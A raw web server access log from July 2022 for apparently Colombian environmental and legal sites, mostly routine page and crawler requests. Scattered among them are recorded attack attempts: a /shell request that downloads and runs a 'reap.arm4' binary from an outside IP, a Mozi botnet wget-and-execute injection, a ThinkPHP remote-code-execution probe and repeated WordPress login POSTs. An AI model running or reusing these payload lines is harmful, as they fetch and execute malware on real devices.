65.154.226.220 - - [05/Jul/2022:01:54:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.220 - - [05/Jul/2022:01:54:35 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.220 - - [05/Jul/2022:01:54:35 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
3.236.221.156 - - [05/Jul/2022:01:54:46 -0500] "GET /portaldeninos/glosario/ HTTP/1.1" 200 97399
172.22.2.4 - - [05/Jul/2022:01:53:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54336
216.245.221.92 - - [05/Jul/2022:01:55:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:01:55:54 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93969
185.119.81.103 - - [05/Jul/2022:01:59:56 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Jul/2022:01:59:57 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
3.236.221.156 - - [05/Jul/2022:01:59:58 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 88617
172.22.2.4 - - [05/Jul/2022:01:58:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jul/2022:02:00:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:01:59:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
66.249.65.13 - - [05/Jul/2022:02:00:53 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:01:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
172.22.2.4 - - [05/Jul/2022:02:02:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63603
172.22.2.4 - - [05/Jul/2022:02:04:17 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
216.245.221.92 - - [05/Jul/2022:02:05:35 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [05/Jul/2022:02:05:46 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Jul/2022:02:05:47 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [05/Jul/2022:02:04:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:02:06:03 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 110003
172.22.2.4 - - [05/Jul/2022:02:05:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
45.164.20.156 - - [05/Jul/2022:02:07:14 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 1013
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.168 - - [05/Jul/2022:02:09:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.168 - - [05/Jul/2022:02:09:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.168 - - [05/Jul/2022:02:09:59 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.168 - - [05/Jul/2022:02:10:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
65.154.226.168 - - [05/Jul/2022:02:10:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.168 - - [05/Jul/2022:02:10:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 88353
66.249.65.13 - - [05/Jul/2022:02:10:13 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:02:10:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:10:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:12:26 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [05/Jul/2022:02:10:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
3.236.221.156 - - [05/Jul/2022:02:14:13 -0500] "GET /portaldeninos/humedal-capellania-2/ HTTP/1.1" 200 88150
3.236.221.156 - - [05/Jul/2022:02:15:05 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89797
216.245.221.92 - - [05/Jul/2022:02:15:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:02:15:36 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:15:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:02:17:45 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:16:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56841
3.236.221.156 - - [05/Jul/2022:02:19:07 -0500] "-" 408 -
66.249.73.134 - - [05/Jul/2022:02:19:49 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:02:20:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:02:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:02:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
3.236.221.156 - - [05/Jul/2022:02:21:06 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:02:21:14 -0500] "GET /portaldeninos/ruido/ HTTP/1.1" 200 88695
110.172.159.146 - - [05/Jul/2022:02:21:15 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
3.236.221.156 - - [05/Jul/2022:02:22:20 -0500] "GET / HTTP/1.1" 304 -
3.236.221.156 - - [05/Jul/2022:02:23:20 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:21:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:02:23:23 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:02:23:26 -0500] "GET /portaldeninos/humedal-el-tunjo/ HTTP/1.1" 200 87862
172.22.2.4 - - [05/Jul/2022:02:22:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55130
3.236.221.156 - - [05/Jul/2022:02:24:48 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:02:25:35 -0500] "HEAD / HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:02:27:15 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89507
173.252.107.118 - - [05/Jul/2022:02:27:18 -0500] "GET /bogota-otorgara-beneficio-ambiental-para-transportadores-de-carga-liviana-a-gas.html HTTP/1.1" 206 896
173.252.107.116 - - [05/Jul/2022:02:27:18 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
40.77.167.67 - - [05/Jul/2022:02:27:20 -0500] "GET /galeria/galeria/fotos/GuaymaralTorca3G.jpg HTTP/1.1" 200 330310
173.252.87.111 - - [05/Jul/2022:02:27:21 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
207.46.13.31 - - [05/Jul/2022:02:27:43 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jul/2022:02:27:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:02:29:20 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:02:29:29 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90607
172.22.2.4 - - [05/Jul/2022:02:28:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
216.245.221.92 - - [05/Jul/2022:02:30:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:02:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:02:30:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
185.119.81.107 - - [05/Jul/2022:02:32:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [05/Jul/2022:02:32:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
3.236.221.156 - - [05/Jul/2022:02:32:56 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:33:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jul/2022:02:35:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:34:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
66.249.65.13 - - [05/Jul/2022:02:36:07 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:02:36:20 -0500] "GET /portaldeninos/publicidad/ HTTP/1.1" 200 87770
172.22.2.4 - - [05/Jul/2022:02:36:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
207.46.13.184 - - [05/Jul/2022:02:38:00 -0500] "GET / HTTP/1.1" 200 319
157.55.39.114 - - [05/Jul/2022:02:40:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 276453
216.245.221.92 - - [05/Jul/2022:02:40:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Jul/2022:02:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
201.245.192.253 - - [05/Jul/2022:02:40:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 500 253
172.22.2.4 - - [05/Jul/2022:02:39:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:02:40:57 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:02:40:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
3.236.221.156 - - [05/Jul/2022:02:41:51 -0500] "GET /portaldeninos/humedal-jaboque-2/ HTTP/1.1" 200 88047
66.249.65.13 - - [05/Jul/2022:02:41:52 -0500] "-" 408 -
207.46.13.8 - - [05/Jul/2022:02:44:03 -0500] "GET /BLA/resoluciones/AUTOS%202011/0171.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jul/2022:02:44:57 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jul/2022:02:45:35 -0500] "HEAD / HTTP/1.1" 200 -
205.169.39.239 - - [05/Jul/2022:02:46:06 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
205.169.39.239 - - [05/Jul/2022:02:46:10 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
205.169.39.239 - - [05/Jul/2022:02:46:11 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
205.169.39.239 - - [05/Jul/2022:02:46:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
205.169.39.239 - - [05/Jul/2022:02:46:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
205.169.39.239 - - [05/Jul/2022:02:46:13 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
205.169.39.239 - - [05/Jul/2022:02:46:13 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
205.169.39.239 - - [05/Jul/2022:02:46:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
205.169.39.239 - - [05/Jul/2022:02:46:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
205.169.39.239 - - [05/Jul/2022:02:46:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
205.169.39.239 - - [05/Jul/2022:02:46:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
205.169.39.239 - - [05/Jul/2022:02:46:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
205.169.39.239 - - [05/Jul/2022:02:46:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
205.169.39.239 - - [05/Jul/2022:02:46:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
205.169.39.239 - - [05/Jul/2022:02:46:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
205.169.39.239 - - [05/Jul/2022:02:46:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
205.169.39.239 - - [05/Jul/2022:02:46:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
205.169.39.239 - - [05/Jul/2022:02:46:18 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
172.22.2.4 - - [05/Jul/2022:02:45:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:45:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53119
3.236.221.156 - - [05/Jul/2022:02:46:54 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [05/Jul/2022:02:45:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56841
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
205.169.39.19 - - [05/Jul/2022:02:48:25 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
205.169.39.19 - - [05/Jul/2022:02:48:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
205.169.39.19 - - [05/Jul/2022:02:48:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 98769
172.22.2.4 - - [05/Jul/2022:02:48:51 -0500] "GET /BLA/boletinlegal/conceptos/2020/46.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jul/2022:02:48:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
66.249.65.13 - - [05/Jul/2022:02:49:23 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:02:50:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:50:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.188.210.227 - - [05/Jul/2022:02:52:33 -0500] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 1151
172.22.2.4 - - [05/Jul/2022:02:51:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
35.204.241.68 - - [05/Jul/2022:02:54:18 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Jul/2022:02:54:45 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 200 3424865
66.249.65.13 - - [05/Jul/2022:02:55:02 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:02:55:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:02:56:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.107 - - [05/Jul/2022:02:58:50 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [05/Jul/2022:02:58:51 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [05/Jul/2022:02:57:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61090
216.245.221.92 - - [05/Jul/2022:03:00:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:03:01:31 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:01:11 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
3.236.221.156 - - [05/Jul/2022:03:02:10 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:02:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.240.2.136 - - [05/Jul/2022:03:04:26 -0500] "-" 408 -
3.236.221.156 - - [05/Jul/2022:03:04:37 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:03:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58435
216.245.221.92 - - [05/Jul/2022:03:05:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [05/Jul/2022:03:07:28 -0500] "-" 408 -
172.22.2.4 - - [05/Jul/2022:03:08:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.236.221.156 - - [05/Jul/2022:03:10:05 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:10:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:09:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54336
185.119.81.103 - - [05/Jul/2022:03:11:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Jul/2022:03:11:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
207.46.13.31 - - [05/Jul/2022:03:11:56 -0500] "GET /galeria/galeria/fotos/Humedal-vaca6G.jpg HTTP/1.1" 200 176858
66.249.65.13 - - [05/Jul/2022:03:13:09 -0500] "-" 408 -
216.245.221.92 - - [05/Jul/2022:03:15:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jul/2022:03:14:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
